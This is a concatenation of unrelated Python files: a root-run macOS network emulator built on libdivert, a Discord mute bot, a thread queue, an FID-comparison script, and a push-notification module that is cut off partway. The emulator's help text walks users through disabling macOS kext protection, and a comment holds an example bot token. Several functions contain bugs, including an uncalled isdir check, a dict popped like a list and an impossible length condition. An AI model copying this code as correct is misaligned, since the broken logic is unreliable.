setattr(getattr(self.libdivert_ref, func_name), "restype", restype)
def _create_config(self):
lib = self.libdivert_ref
# create divert handle
divert_handle = lib.divert_create(0, 0)
if not divert_handle:
raise RuntimeError('Fail to create divert handle.')
# create config handle
config = lib.emulator_create_config(divert_handle,
Flags.EMULALTOR_BUF_SIZE)
if not config:
raise RuntimeError('Fail to create emulator configuration')
# set callback function and callback data for divert handle
if lib.divert_set_callback(divert_handle,
lib.emulator_callback,
config) != 0:
raise RuntimeError(divert_handle.errmsg)
# activate divert handle
if lib.divert_activate(divert_handle) != 0:
raise RuntimeError(divert_handle.errmsg)
return divert_handle, config
def _divert_loop(self, filter_str):
# first add all PIDs into list
self._wait_pid()
if self.quit_loop:
self.quit_loop = False
return
lib = self.libdivert_ref
lib.divert_loop(self.handle, -1)
def _divert_loop_stop(self):
lib = self.libdivert_ref
lib.divert_loop_stop(self.handle)
lib.divert_loop_wait(self.handle)
print 'Emulator stop OK'
lib.emulator_flush(self.config)
print 'Emulator flush OK'
def add_pipe(self, pipe, direction=Flags.DIRECTION_IN):
lib = self.libdivert_ref
if lib.emulator_add_pipe(self.config, pipe.handle, direction) != 0:
raise RuntimeError("Pipe already exists.")
def del_pipe(self, pipe, free_mem=False):
lib = self.libdivert_ref
if lib.emulator_del_pipe(self.config, pipe.handle, int(free_mem)) != 0:
raise RuntimeError("Pipe do not exists.")
def add_pid(self, pid):
self.pid_list.append(pid)
def set_device(self, dev_name):
lib = self.libdivert_ref
if lib.divert_set_device(self.handle, dev_name) != 0:
raise RuntimeError('Could not set capture device.')
def _wait_pid(self):
# first wait until all processes are started
proc_list = filter(lambda x: isinstance(x, str) or isinstance(x, unicode), self.pid_list)
real_pid_list = filter(lambda x: isinstance(x, int), self.pid_list)
self.is_waiting = True
while not self.quit_loop:
if len(real_pid_list) == len(self.pid_list):
break
for proc in psutil.process_iter():
proc_name = proc.name().lower()
for name in proc_list:
if name.lower() in proc_name:
real_pid_list.append(proc.pid)
print 'Waiting for process: %s' % ', '.join(proc_list)
time.sleep(0.2)
self.is_waiting = False
if self.quit_loop:
return
print 'Found PID: %s' % ', '.join(map(str, real_pid_list))
lib = self.libdivert_ref
arr_len = len(real_pid_list)
arr_type = c_int32 * arr_len
lib.emulator_set_pid_list(self.config, arr_type(*real_pid_list), arr_len)
def set_dump(self, directory):
lib = self.libdivert_ref
if not os.path.isdir:
raise RuntimeError('Invalid save position.')
lib.emulator_set_dump_pcap(self.config, directory)
def start(self, filter_str=''):
# first check the config
lib = self.libdivert_ref
if lib.emulator_config_check(self.config, self.errmsg) != 0:
raise RuntimeError('Invalid configuration:\n%s' % self.errmsg.value)
print 'Config check OK'
# then apply filter string
if filter_str:
if lib.divert_update_ipfw(self.handle, filter_str) != 0:
raise RuntimeError(self.handle.errmsg)
# start a new thread to run emulator
self.thread = threading.Thread(target=self._divert_loop, args=(filter_str,))
self.thread.start()
def stop(self):
# if emulator is waiting on PIDs
# then just use a quit loop flag
if self.is_waiting:
self.quit_loop = True
else:
self._divert_loop_stop()
self.thread.join(timeout=1.0)
if self.thread.isAlive():
raise RuntimeError('Divert loop failed to stop.')
self.thread = None
@property
def is_looping(self):
return self.thread is not None and self.thread.isAlive()
def data_size(self, direction):
lib = self.libdivert_ref
return lib.emulator_data_size(self.config, direction)
class EmulatorGUI(object):
LOCAL_MODE = 0
ROUTER_MODE = 1
prompt_str = 'PID / comma separated process name'
default_device = 'bridge100'
kext_errmsg = """
Kernel extension load failed.
Please check if you have root privilege on your Mac.
Since we do not have a valid developer certificate,
you should manually disable the kernel extension protection.
For Mac OS X 10.11:
1. Start your computer from recovery mode: restart your Mac
and hold down the Command and R keys at startup.
2. Run "csrutil enable --without kext" under recovery mode.
3. Reboot.
For Mac OS X 10.10:
1. Run "sudo nvram boot-args=kext-dev-mode=1" from terminal.
2. Reboot.
"""
pipe_name2type = {
'drop': DropPipe,
'delay': DelayPipe,
'biterr': BiterrPipe,
'disorder': DisorderPipe,
'throttle': ThrottlePipe,
'duplicate': DuplicatePipe,
'bandwidth': BandwidthPipe,
}
def exit_func(self):
if self.emulator is not None:
try:
self.emulator.stop()
self.emulator = None
except Exception as e:
print e.message
self._flush_ipfw()
self.master.quit()
self.master.destroy()
def _flush_ipfw(self):
if Emulator.libdivert_ref is not None:
buf = create_string_buffer(256)
lib = Emulator.libdivert_ref
lib.ipfw_flush(buf)
def decide_iface(self):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("gmail.com", 80))
local_ip = s.getsockname()[0]
s.close()
except:
showwarning('Network Error',
('Your host machine may not have a valid network connection.\n'
'You should **manually** choose your network device name in filter rule.'))
return
iface_lst = netifaces.interfaces()
for iface in iface_lst:
addrs = netifaces.ifaddresses(iface)
if netifaces.AF_INET in addrs:
addr_dict = addrs[netifaces.AF_INET][0]
if 'addr' in addr_dict:
if addr_dict['addr'] == local_ip:
print 'Found activate network interface: %s' % iface
self.iface = iface
return
def __init__(self, master):
self.master = master
self.emulator = None
self.conf_dict = {}
self.conf_name = tk.StringVar()
self.conf_frame = None
master.title("Wireless Network Reproduction")
master.protocol("WM_DELETE_WINDOW", self.exit_func)
# first check root privilege
if os.getuid() != 0:
self.master.withdraw()
showerror('Privilege Error', 'You should run this program as root.')
self.master.destroy()
return
# then find the current activate network interface
self.iface = '<network device name>'
self.decide_iface()
self.default_rule = 'ip from any to any via %s' % self.iface
self.inbound_list = []
self.outbound_list = []
self.filter_str = tk.StringVar(value=self.default_rule)
self.proc_str = tk.StringVar(value=self.prompt_str)
self.dev_str = tk.StringVar()
self.dump_pos = tk.StringVar()
self.divert_unknown = tk.IntVar(value=1)
self.start_btn = None
self.filter_entry = None
self.proc_entry = None
self.dev_entry = None
self.mode = tk.IntVar(self.LOCAL_MODE)
self.init_GUI()
try:
Emulator()
except OSError:
def close_func():
self.master.quit()
self.master.destroy()
self.master.withdraw()
top = tk.Toplevel(self.master)
top.title('Kernel Extension Error')
tk.Message(top, text=self.kext_errmsg)\
.pack(side=tk.TOP, fill=tk.BOTH, expand=True)
tk.Button(top, text="Close", command=close_func).pack(side=tk.TOP)
top.protocol("WM_DELETE_WINDOW", close_func)
except Exception as e:
self.master.withdraw()
showerror('Emulator Loading Error', e.message)
self.master.destroy()
def init_GUI(self):
new_frame = tk.Frame(master=self.master)
tk.Button(master=new_frame, text='Add Configuration',
command=self.load_data_file).pack(side=tk.LEFT)
self.conf_frame = tk.Frame(master=new_frame)
self.conf_frame.pack(side=tk.RIGHT, fill=tk.X, expand=True)
new_frame.pack(side=tk.TOP, fill=tk.X, expand=True)
new_frame = tk.Frame(master=self.master)
tk.Label(master=new_frame, text='Dump .pcap to').pack(side=tk.LEFT)
tk.Entry(master=new_frame, textvariable=self.dump_pos)\
.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)
tk.Button(master=new_frame, text='Select',
command=self.load_dump_pos).pack(side=tk.LEFT)
new_frame.pack(side=tk.TOP, fill=tk.X, expand=True)
new_frame = tk.Frame(master=self.master)
tk.Label(master=new_frame, text='Filter Rule').pack(side=tk.LEFT)
self.filter_entry = tk.Entry(master=new_frame, textvariable=self.filter_str, font='Monaco')
self.filter_entry.pack(side=tk.LEFT, fill=tk.X, expand=True)
new_frame.pack(side=tk.TOP, fill=tk.X, expand=True)
new_frame = tk.Frame(master=self.master)
tk.Label(master=new_frame, text='Process List').pack(side=tk.LEFT)
self.proc_entry = tk.Entry(master=new_frame, textvariable=self.proc_str,
font='Monaco', width=len(self.proc_str.get()))
self.proc_entry.pack(side=tk.LEFT, fill=tk.X, expand=True)
tk.Label(master=new_frame, text='unknown').pack(side=tk.LEFT)
tk.Checkbutton(master=new_frame, variable=self.divert_unknown).pack(side=tk.LEFT)
new_frame.pack(side=tk.TOP, fill=tk.X, expand=True)
new_frame = tk.Frame(master=self.master)
tk.Label(master=new_frame, text='Mode').pack(side=tk.LEFT)
tk.Radiobutton(master=new_frame, text="Local", variable=self.mode,
value=0, command=self._switch_mode).pack(side=tk.LEFT)
tk.Radiobutton(master=new_frame, text="WiFi", variable=self.mode,
value=1, command=self._switch_mode).pack(side=tk.LEFT)
self.dev_entry = tk.Entry(master=new_frame, textvariable=self.dev_str,
state=tk.DISABLED, font='Monaco', width=12)
self.dev_entry.pack(side=tk.LEFT)
tk.Button(master=new_frame, text='Fix network',
command=self._flush_ipfw).pack(side=tk.LEFT)
new_frame.pack(side=tk.TOP, fill=tk.X, expand=True)
new_frame = tk.Frame(master=self.master)
self.start_btn = tk.Button(master=new_frame, text='Start',
command=self.start, font=('Monaco', 20))
self.start_btn.pack(side=tk.TOP)
new_frame.pack(side=tk.TOP, fill=tk.X, expand=True)
def _switch_mode(self):
if self.mode.get() == self.LOCAL_MODE:
# local mode
self.dev_str.set('')
self.dev_entry.config(state=tk.DISABLED)
self.filter_entry.config(state=tk.NORMAL)
self.proc_entry.config(state=tk.NORMAL)
self.filter_str.set(self.default_rule)
self.proc_str.set(self.prompt_str)
elif self.mode.get() == self.ROUTER_MODE:
self.dev_entry.config(state=tk.NORMAL)
self.dev_str.set(self.default_device)
self.filter_str.set('ip from any to any')
self.proc_str.set('')
self.filter_entry.config(state=tk.DISABLED)
self.proc_entry.config(state=tk.DISABLED)
else:
raise RuntimeError('Unknown Mode!')
def load_data_file(self):
dir_name, file_name = os.path.split(__file__)
dir_name = os.path.join(dir_name, 'examples')
file_path = askopenfilename(title='Choose .json file', initialdir=dir_name)
if file_path and os.path.isfile(file_path):
try:
_, fname = os.path.split(file_path)
with open(file_path, 'r') as fid:
data = fid.read()
self.conf_dict[file_path] = json.loads(data)
fname_sec = fname.split('.')
if len(fname_sec) > 1:
fname = '.'.join(fname_sec[:-1])
tk.Radiobutton(self.conf_frame, text=fname,
variable=self.conf_name,
value=file_path).pack(side=tk.LEFT)
self.conf_name.set(file_path)
except Exception as e:
showerror(title='Open file',
message='Unable to load json: %s' % e.message)
def load_dump_pos(self):
dir_name, file_name = os.path.split(__file__)
dir_name = os.path.join(dir_name, 'examples')
dir_path = askdirectory(title='Choose dump position',
initialdir=dir_name)
self.dump_pos.set(dir_path)
def start(self):
if self.conf_name.get() not in self.conf_dict:
showerror(title='Configuration Error',
message='No available conf file.')
return
if self.proc_str.get() == self.prompt_str:
showerror(title='Process/PID Error',
message='You should set legal PIDs or leave it blank.')
return
if self.emulator is None:
try:
self.emulator = Emulator()
self._load_config()
self.emulator.start(self.filter_str.get())
self.start_btn.config(text='Stop')
except Exception as e:
self.emulator = None
showerror(title='Runtime error',
message='Unable to start emulator:\n%s' % e.message)
else:
try:
self.emulator.stop()
self.emulator = None
self.start_btn.config(text='Start')
except Exception as e:
self.emulator = None
showerror(title='Runtime error',
message='Unable to stop emulator:\n%s' % e.message)
def _load_config(self):
if self.emulator is None:
return
# set dump position
dump_path = self.dump_pos.get()
if dump_path and os.path.isdir(dump_path):
self.emulator.set_dump(dump_path)
# set emulation device
dev_name = self.dev_str.get()
if dev_name:
self.emulator.set_device(dev_name)
# set pid list if not empty
if self.mode.get() == self.LOCAL_MODE:
pid_str = self.proc_str.get().strip()
if pid_str and pid_str != self.prompt_str:
if self.divert_unknown.get():
self.emulator.add_pid(-1)
for pid in map(lambda x: x.strip(), pid_str.split(',')):
try:
pid_int = int(pid)
self.emulator.add_pid(pid_int)
except:
self.emulator.add_pid(pid)
elif self.mode.get() == self.ROUTER_MODE:
# this is a fake PID, nothing would match
self.emulator.add_pid(-2)
else:
raise RuntimeError("Unknown Mode!")
# finally load all pipes
for pipe in copy.deepcopy(self.conf_dict[self.conf_name.get()]):
if not isinstance(pipe, dict):
raise TypeError('Invalid configuration')
pipe_name = pipe.pop('pipe', None)
if not pipe_name:
raise RuntimeError('Configuration do not have pipe type')
direction = pipe.pop('direction', None)
if not direction:
raise RuntimeError('Configuration do not have direction field')
if direction == "out":
dir_flag = Flags.DIRECTION_OUT
elif direction == "in":
dir_flag = Flags.DIRECTION_IN
else:
raise RuntimeError('Unknown direction flag')
ip_filter = self._create_ip_filter(pipe.pop('ip_filter', None))
size_filter = self._create_size_filter(pipe.pop('size_filter', None))
try:
pipe_type = self.pipe_name2type[pipe_name.lower()]
except:
raise RuntimeError('Invalid pipe type')
pipe_obj = pipe_type(ip_filter_obj=ip_filter,
size_filter_obj=size_filter, **pipe)
self.emulator.add_pipe(pipe_obj, dir_flag)
def _create_size_filter(self, filter_dict):
if not filter_dict:
return None
size_arr = filter_dict['size']
rate_arr = filter_dict['rate']
return Emulator.PacketSizeFilter(size_arr, rate_arr)
def _create_ip_filter(self, filter_dict):
if not filter_dict:
return None
src_str = filter_dict['src']
dst_str = filter_dict['dst']
strip_func = lambda x: x.strip()
src_addr, port_src = map(strip_func, src_str.split(':'))
src_addr, src_mask = map(strip_func, src_addr.split('/'))
dst_addr, port_dst = map(strip_func, dst_str.split(':'))
dst_addr, dst_mask = map(strip_func, dst_addr.split('/'))
return Emulator.PacketIPFilter(src_addr, src_mask,
dst_addr, dst_mask,
int(port_src), int(port_dst))
def mainloop(self):
self.master.mainloop()
if __name__ == '__main__':
pid_num = 0
try:
pid_num = int(sys.argv[1])
except Exception as e:
print 'Exception: %s' % e.message
print 'Usage: python emulator.py <PID>'
exit(-1)
emulator = Emulator()
emulator.add_pid(pid_num)
emulator.add_pid(-1)
emulator.set_dump('/Users/baidu/Downloads')
emulator.add_pipe(DelayPipe([0, 10], [0.1, 0.6], 1024), Flags.DIRECTION_IN)
is_looping = True
# register signal handler
def sig_handler(signum, frame):
print 'Catch signal: %d' % signum
global is_looping
is_looping = False
signal.signal(signal.SIGINT, sig_handler)
signal.signal(signal.SIGTSTP, sig_handler)
perMB = 1024 * 1024
trans_size = 0
# start loop
emulator.start('ip from any to any via en0')
while is_looping:
data_size = emulator.data_size(Flags.DIRECTION_IN)
if data_size > 5 * perMB:
print 'Finish'
break
if data_size > (trans_size + 1) * perMB:
trans_size = data_size / perMB
print 'Transfer %d MB data.' % trans_size
time.sleep(0.5)
# stop loop
emulator.stop()
print 'Program exited.'
|
Bot.py
|
import threading
import discord
from discord.ext import commands
from discord.ext.commands.core import has_permissions
from discord import *
import os,json
import time as times
import requests
#MODIFY DATA
PREFIX="YOUR PREFIX HERE"
TOKEN="YOUR TOKEN HERE"
intents=discord.Intents.all()
client=commands.Bot(command_prefix=PREFIX,intents=intents)
client.token=TOKEN
client.api="https://discord.com/api/v8"
if not os.path.isfile("scheduledmute.json"):
with open("scheduledmute.json","w") as f:
json.dump({"mutes":[],"roles":[]},f,indent=4)
@client.event
async def on_ready():
print(f"Online als {client.user}")
def check_events():
while True:
with open("scheduledmute.json","r") as f:
xd=json.load(f)
for a in xd["mutes"]:
if int(a[1]) <= times.time():
xd.pop(xd.index(a))
with open("scheduledmute.json","w") as f:
json.dump(xd,f,indent=4)
if a[0] == "unmute":
headers={
"authorization":f"Bot {client.token}"
}
for a in xd["roles"]:
requests.delete(f"{client.api}/guilds/920739361304244264/members/{a[2]}/roles/{a}",headers=headers)
times.sleep(1)
def convert(time):
pos = ["s","m","h","d","w"]
time_dict = {"s" : 1, "m" : 60, "h" : 3600 , "d" : 3600*24, "w": 3600*24*7}
unit = time[-1].lower()
if unit not in pos:
return -1
try:
val = int(time[:-1])
except:
return -2
return val * time_dict[unit]
@client.event
async def on_command_error(ctx,error):
if not isinstance(error,commands.CommandNotFound):
embed=discord.Embed(description=str(error).capitalize(),color=discord.Colour.red())
await ctx.send(embed=embed)
@client.event
async def on_message(message):
if message.author.bot:
return
await client.process_commands(message)
@client.command()
@has_permissions(kick_members=True)
async def mute(ctx,member:discord.Member,*,time):
time=convert(time)
if not time in [-1,-2]:
pass
elif time==-1:
raise commands.BadArgument("Possible Declarations: `s` second `m` minute `h` hour `d` day `w` week\nPlease separate the individual declarations with a /")
else:
raise commands.BadArgument("Please separate the individual declarations with a /")
with open("scheduledmute.json","r") as f:
xd=json.load(f)
added=False
for a in xd["roles"]:
try:
role=ctx.guild.get_role(a)
await member.add_roles(role)
except:
pass
else:
added=True
if added==False:
return await ctx.send(embed=discord.Embed(description=f"There is no Muted Role, you can create one `{PREFIX}create_mute_role`",color=discord.Colour.red()))
list=["unmute",times.time()+time,member.id]
with open("scheduledmute.json","r") as f:
xd=json.load(f)
xd["mutes"].append(list)
with open("scheduledmute.json","w") as f:
json.dump(xd,f,indent=4)
embed=discord.Embed(description=f"{member.mention} was muted for {time} seconds.",color=discord.Colour.green())
await ctx.send(embed=embed)
@client.command()
@has_permissions(kick_members=True)
async def unmute(ctx,member:discord.Member):
with open("scheduledmute.json","r") as f:
xd=json.load(f)
for a in xd["mutes"]:
if a[0]=="unmute" and a[2]==member.id:
xd[xd.index(a)][1]=times.time()
with open("scheduledmute.json","w") as f:
json.dump(xd,f,indent=4)
embed=discord.Embed(description=f"{member.mention} was unmuted.",color=discord.Colour.green())
await ctx.send(embed=embed)
@client.command()
@has_permissions(manage_guild=True)
async def create_mute_role(ctx):
role=await ctx.guild.create_role("Muted")
for channel in ctx.guild.channels:
if isinstance(channel,discord.TextChannel):
await channel.set_permissions(role,send_messages=False)
elif isinstance(channel,discord.VoiceChannel):
await channel.set_permissions(role,connect=False)
with open("scheduledmute.json","r") as f:
xd=json.load(f)
xd["roles"].append(role.id)
with open("scheduledmute.json","w") as f:
json.dump(xd,f,indent=4)
t1=threading.Thread(target=check_events)
t1.start()
client.run(client.token)
|
action.py
|
import threading
from time import sleep
class ActionQueue(object):
IDLE = "idle"
RUNNING = "running"
STOPPED = "stopped"
def __init__(self, parent):
self.parent = parent
self.queue = []
def make_thread_fnc(self):
def thread_fnc():
i = 0
while self.parent.running == True and self.parent.state != ActionQueue.STOPPED:
if self.parent.state == ActionQueue.RUNNING and self.len > 0:
curr_action = self.remove()
if curr_action is not None:
curr_action()
sleep(0.25)
return thread_fnc
def run(self):
self.t = threading.Thread(target=self.make_thread_fnc())
self.t.start()
@property
def len(self):
return len(self.queue)
def add(self, action):
self.queue.append(action)
def remove(self):
if self.len == 0:
return None
top = self.queue[0]
if self.len <= 1:
self.queue = []
else:
self.queue = self.queue[1:]
return top
def clear(self):
self.queue = []
|
compute_FIDs.py
|
#!/usr/bin/env python3
"""
Computes the FID between different datasets. You need a script that takes paths to two dataset can computes the FID from
it as an executable. Example: https://github.com/mseitzer/pytorch-fid/blob/master/fid_score.py
"""
import subprocess
import threading
NUM_THREADS = 8
def main():
comparisons = []
sets = [
["original/blue", "original/red", "original/green", "original/b_white", "original/m_white", "original/l_white"],
["20_sib_cropped/blue", "20_sib_cropped/red", "20_sib_cropped/green", "20_sib_cropped/b_white", "20_sib_cropped/m_white", "20_sib_cropped/l_white"],
["style3/blue", "style3/red", "style3/green", "style3/b_white", "style3/m_white", "style3/l_white"],
["pix2pix/blue", "pix2pix/red", "pix2pix/green", "pix2pix/b_white", "pix2pix/m_white", "pix2pix/l_white"]
]
for set in sets:
for idx_s in range(len(set)):
for idx_t in range(idx_s + 1, len(set)):
comparisons.append((set[idx_s], set[idx_t]))
datapath = "/home/dwalder/dataspace/fid/"
execuatable = "./fid_score.py"
def get_comparison():
if comparisons:
return comparisons.pop()
else:
return None
lock = threading.Lock()
def compute_fid():
while True:
lock.acquire(blocking=True)
try:
comp = get_comparison()
if comp is None:
break
set1, set2 = comp
finally:
lock.release()
ret = subprocess.run([execuatable, datapath + set1, datapath + set2], stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, universal_newlines=True)
msg = ""
if ret.returncode:
msg = "{} exited with code {}:\n{}".format(ret.args, ret.returncode, ret.stdout)
out = str(ret.stdout).split()
try:
fid = float(out[-1][:4])
except ValueError as e:
msg = "Could not read out FID score for {} vs {}:\nout: {}\nerr: {}".format(set1, set2, ret.stdout, e)
if not msg:
msg = "{} vs {}: {}".format(set1, set2, fid)
lock.acquire(blocking=True)
try:
print(msg)
finally:
lock.release()
threads = []
for _ in range(NUM_THREADS):
thread = threading.Thread(target=compute_fid)
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
if __name__ == "__main__":
main()
|
sendNotify.py
|
# !/usr/bin/env python3
# -*- coding: utf-8 -*-
# @Time : 2021/10/31
# @Author : Oreomeow
# @Modify : MashiroF
# @File : sendNotify.py
# @Software: PyCharm
import base64
import hashlib
import hmac
import json
import os
import re
import sys
import threading
import time
import urllib.parse
import requests
# 原先的 print 函数和主线程的锁
_print = print
mutex = threading.Lock()
# 定义新的 print 函数
def print(text, *args, **kw):
"""
使输出有序进行,不出现多线程同一时间输出导致错乱的问题。
"""
with mutex:
_print(text, *args, **kw)
# 通知服务
# fmt: off
push_config = {
'HITOKOTO': False, # 启用一言(随机句子)
'BARK_PUSH': '', # bark IP 或设备码,例:https://api.day.app/DxHcxxxxxRxxxxxxcm/
'BARK_ARCHIVE': '', # bark 推送是否存档
'BARK_GROUP': '', # bark 推送分组
'BARK_SOUND': '', # bark 推送声音
'CONSOLE': False, # 控制台输出
'DD_BOT_SECRET': '', # 钉钉机器人的 DD_BOT_SECRET
'DD_BOT_TOKEN': '', # 钉钉机器人的 DD_BOT_TOKEN
'FSKEY': '', # 飞书机器人的 FSKEY
'GOBOT_URL': '', # go-cqhttp
# 推送到个人QQ:http://127.0.0.1/send_private_msg
# 群:http://127.0.0.1/send_group_msg
'GOBOT_QQ': '', # go-cqhttp 的推送群或用户
# GOBOT_URL 设置 /send_private_msg 时填入 user_id=个人QQ
# /send_group_msg 时填入 group_id=QQ群
'GOBOT_TOKEN': '', # go-cqhttp 的 access_token
'IGOT_PUSH_KEY': '', # iGot 聚合推送的 IGOT_PUSH_KEY
'PUSH_KEY': '', # server 酱的 PUSH_KEY,兼容旧版与 Turbo 版
'PUSH_PLUS_TOKEN': '', # push+ 微信推送的用户令牌
'PUSH_PLUS_USER': '', # push+ 微信推送的群组编码
'QMSG_KEY': '', # qmsg 酱的 QMSG_KEY
'QMSG_TYPE': '', # qmsg 酱的 QMSG_TYPE
'QYWX_AM': '', # 企业微信应用
'QYWX_KEY': '', # 企业微信机器人
'TG_BOT_TOKEN': '', # tg 机器人的 TG_BOT_TOKEN,例:1407203283:AAG9rt-6RDaaX0HBLZQq0laNOh898iFYaRQ
'TG_USER_ID': '', # tg 机器人的 TG_USER_ID,例:1434078534
'TG_API_HOST': '', # tg 代理 api
'TG_PROXY_AUTH': '', # tg 代理认证参数
'TG_PROXY_HOST': '', # tg 机器人的 TG_PROXY_HOST
'TG_PROXY_PORT': '', # tg 机器人的 TG_PROXY_PORT
}
notify_function = []
## 环境变量优先级 > 配信文件优先级
for key in push_config:
if os.getenv(key):
value = os.getenv(key)
push_config[key] = value
########################################配信方法定义#############################################
def bark(title: str, content: str) -> None:
"""
使用 bark 推送消息。
"""
if not push_config.get("BARK_PUSH"):
print("bark 服务的 BARK_PUSH 未设置!!\n取消推送")
return
print("bark 服务启动")
if push_config.get("BARK_PUSH").startswith("http"):
url = f'{push_config.get("BARK_PUSH")}/{urllib.parse.quote_plus(title)}/{urllib.parse.quote_plus(content)}'
else:
url = f'https://api.day.app/{push_config.get("BARK_PUSH")}/{urllib.parse.quote_plus(title)}/{urllib.parse.quote_plus(content)}'
bark_params = {
"BARK_ARCHIVE": "isArchive",
"BARK_GROUP": "group",
"BARK_SOUND": "sound",
}
params = ""
for pair in filter(
lambda pairs: pairs[0].startswith("BARK_")
and pairs[0] != "BARK_PUSH"
and pairs[1]
and bark_params.get(pairs[0]),
push_config.items(),
):
params += f"{bark_params.get(pair[0])}={pair[1]}&"
if params:
url = url + "?" + params.rstrip("&")
response = requests.get(url).json()
if response["code"] == 200:
print("bark 推送成功!")
else:
print("bark 推送失败!")
def console(title: str, content: str) -> None:
"""
使用 控制台 推送消息。
"""
print(f"{title}\n\n{content}")
def dingding_bot(title: str, content: str) -> None:
"""
使用 钉钉机器人 推送消息。
"""
if not push_config.get("DD_BOT_SECRET") or not push_config.get("DD_BOT_TOKEN"):
print("钉钉机器人 服务的 DD_BOT_SECRET 或者 DD_BOT_TOKEN 未设置!!\n取消推送")
return
print("钉钉机器人 服务启动")
timestamp = str(round(time.time() * 1000))
secret_enc = push_config.get("DD_BOT_SECRET").encode("utf-8")
string_to_sign = "{}\n{}".format(timestamp, push_config.get("DD_BOT_SECRET"))
string_to_sign_enc = string_to_sign.encode("utf-8")
hmac_code = hmac.new(
secret_enc, string_to_sign_enc, digestmod=hashlib.sha256
).digest()
sign = urllib.parse.quote_plus(base64.b64encode(hmac_code))
url = f'https://oapi.dingtalk.com/robot/send?access_token={push_config.get("DD_BOT_TOKEN")}×tamp={timestamp}&sign={sign}'
headers = {"Content-Type": "application/json;charset=utf-8"}
data = {"msgtype": "text", "text": {"content": f"{title}\n\n{content}"}}
response = requests.post(
url=url, data=json.dumps(data), headers=headers, timeout=15
).json()
if not response["errcode"]:
print("钉钉机器人 推送成功!")
else:
print("钉钉机器人 推送失败!")
def feishu_bot(title: str, content: str) -> None:
"""
使用 飞书机器人 推送消息。
"""
if not push_config.get("FSKEY"):
print("飞书 服务的 FSKEY 未设置!!\n取消推送")
return
print("飞书 服务启动")
url = f'https://open.feishu.cn/open-apis/bot/v2/hook/{push_config.get("FSKEY")}'
data = {"msg_type": "text", "content": {"text": f"{title}\n\n{content}"}}
response = requests.post(url, data=json.dumps(data)).json()
if response.get("StatusCode") == 0:
print("飞书 推送成功!")
else:
print("飞书 推送失败!错误信息如下:\n", response)
def go_cqhttp(title: str, content: str) -> None:
"""
使用 go_cqhttp 推送消息。
"""
if not push_config.get("GOBOT_URL") or not push_config.get("GOBOT_QQ"):
print("go-cqhttp 服务的 GOBOT_URL 或 GOBOT_QQ 未设置!!\n取消推送")
return
print("go-cqhttp 服务启动")
url = f'{push_config.get("GOBOT_URL")}?access_token={push_config.get("GOBOT_TOKEN")}&{push_config.get("GOBOT_QQ")}&message=标题:{title}\n内容:{content}'
response = requests.get(url).json()
if response["status"] == "ok":
print("go-cqhttp 推送成功!")
else:
print("go-cqhttp 推送失败!")
def iGot(title: str, content: str) -> None:
"""
使用 iGot 推送消息。
"""
if not push_config.get("IGOT_PUSH_KEY"):
print("iGot 服务的 IGOT_PUSH_KEY 未设置!!\n取消推送")
return
print("iGot 服务启动")
url = f'https://push.hellyw.com/{push_config.get("IGOT_PUSH_KEY")}'
data = {"title": title, "content": content}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
response = requests.post(url, data=data, headers=headers).json()
if response["ret"] == 0:
print("iGot 推送成功!")
else:
print(f'iGot 推送失败!{response["errMsg"]}')
def serverJ(title: str, content: str) -> None:
"""
通过 serverJ 推送消息。
"""
if not push_config.get("PUSH_KEY"):
print("serverJ 服务的 PUSH_KEY 未设置!!\n取消推送")
return
print("serverJ 服务启动")
data = {"text": title, "desp": content.replace("\n", "\n\n")}
if push_config.get("PUSH_KEY").index("SCT") != -1:
url = f'https://sctapi.ftqq.com/{push_config.get("PUSH_KEY")}.send'
else:
url = f'https://sc.ftqq.com/${push_config.get("PUSH_KEY")}.send'
response = requests.post(url, data=data).json()
if response.get("errno") == 0 or response.get("code") == 0:
print("serverJ 推送成功!")
else:
print(f'serverJ 推送失败!错误码:{response["message"]}')
def pushplus_bot(title: str, content: str) -> None:
"""
通过 push+ 推送消息。
"""
if not push_config.get("PUSH_PLUS_TOKEN"):
print("PUSHPLUS 服务的 PUSH_PLUS_TOKEN 未设置!!\n取消推送")
return
print("PUSHPLUS 服务启动")
url = "http://www.pushplus.plus/send"
data = {
"token": push_config.get("PUSH_PLUS_TOKEN"),
"title": title,
"content": content,
"topic": push_config.get("PUSH_PLUS_USER"),
}
body = json.dumps(data).encode(encoding="utf-8")
headers = {"Content-Type": "application/json"}
response = requests.post(url=url, data=body, headers=headers).json()
if response["code"] == 200:
print("PUSHPLUS 推送成功!")
else:
print("PUSHPLUS 推送失败!")
def qmsg_bot(title: str, content: str) -> None:
"""
使用 qmsg 推送消息。
"""
if not push_config.get("QMSG_KEY") or not push_config.get("QMSG_TYPE"):
print("qmsg 的 QMSG_KEY 或者 QMSG_TYPE 未设置!!\n取消推送")
return
print("qmsg 服务启动")
url = f'https://qmsg.zendee.cn/{push_config.get("QMSG_TYPE")}/{push_config.get("QMSG_KEY")}'
payload = {"msg": f'{title}\n\n{content.replace("----", "-")}'.encode("utf-8")}
response = requests.post(url=url, params=payload).json()
if response["code"] == 0:
print("qmsg 推送成功!")
else:
print(f'qmsg 推送失败!{response["reason"]}')
def wecom_app(title: str, content: str) -> None:
"""
通过 企业微信 APP 推送消息。
"""
if not push_config.get("QYWX_AM"):
print("QYWX_AM 未设置!!\n取消推送")
return
QYWX_AM_AY = re.split(",", push_config.get("QYWX_AM"))
if 4 < len(QYWX_AM_AY) > 5:
print("QYWX_AM 设置错误!!\n取消推送")
return
print("企业微信 APP 服务启动")
corpid = QYWX_AM_AY[0]
corpsecret = QYWX_AM_AY[1]
touser = QYWX_AM_AY[2]
agentid = QYWX_AM_AY[3]
try:
media_id = QYWX_AM_AY[4]
except IndexError:
media_id = ""
wx = WeCom(corpid, corpsecret, agentid)
# 如果没有配置 media_id 默认就以 text 方式发送
if not media_id:
message = title + "\n\n" + content
response = wx.send_text(message, touser)
else:
response = wx.send_mpnews(title, content, media_id, touser)
if response == "ok":
print("企业微信推送成功!")
else:
print("企业微信推送失败!错误信息如下:\n", response)
class WeCom:
def __init__(self, corpid, corpsecret, agentid):
self.CORPID = corpid
self.CORPSECRET = corpsecret
self.AGENTID = agentid
def get_access_token(self):
url = "https://qyapi.weixin.qq.com/cgi-bin/gettoken"
values = {
"corpid": self.CORPID,
"corpsecret": self.CORPSECRET,
}
req = requests.post(url, params=values)
data = json.loads(req.text)
return data["access_token"]
def send_text(self, message, touser="@all"):
send_url = (
